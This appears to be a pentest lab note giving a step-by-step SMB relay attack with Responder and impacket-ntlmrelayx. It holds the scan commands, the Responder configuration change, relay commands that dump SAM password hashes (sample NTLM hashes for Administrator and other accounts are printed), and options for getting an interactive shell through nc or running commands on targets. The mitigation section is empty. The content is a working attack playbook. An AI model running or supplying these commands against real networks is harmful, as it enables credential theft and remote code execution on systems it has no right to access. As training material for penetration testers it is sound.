What is?

Instead of cracking hashes generated with Responder, we can instead relay those hashes to specific machines and potentially gain access

Requirements

Steps

  1. Identify hosts without SMB signing using Nmap or other vulnerability scanner like Nessus

    1. Look for: Message signing enabled but not required
    nmap --script=smb2-security-mode.nse -p 445 192.168.150.0/24 -Pn (Noisy)
    netexec 192.168.150.0/24 (Quiet, Preferred)
    

    image.png

    image.png

  2. Edit Responder.conf to toggle SMB and HTTP to Off to ensure the captured hashes are being relayed

    sudo mousepad /etc/responder/Responder.conf
    

    image.png

  3. Run Responder

  4. Set up your relay using ntlmrelayx. When the Responder captures a hash, it’ll forward the hash to this NTLM relay, and the relay will forward the hash to the selected targets

    impacket-ntlmrelayx -tf targets.txt -smb2support
    

    image.png

  5. An Event Occurs

    image.png

  6. Win

    image.png

    The SAM hashes are dumped in the below .sam file

    image.png

    Administrator:500:aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f:::
    Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:0059cd11c3efaa5d1d145f9bf0218387:::
    peterparker:1001:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
    
  7. Other Wins

    1. Add -i at the end of ntlmrelayx command to get an interactive shell

      impacket-ntlmrelayx -tf targets.txt -smb2support -i
      

      image.png

      • Use nc to connect to the shell
      nc 127.0.0.1 11000
      

      image.png

      image.png

    2. Run command using -c at the end of ntlmrelayx command:

      impacket-ntlmrelayx -tf targets.txt -smb2support -c "whoami"
      

Mitigation Strategies: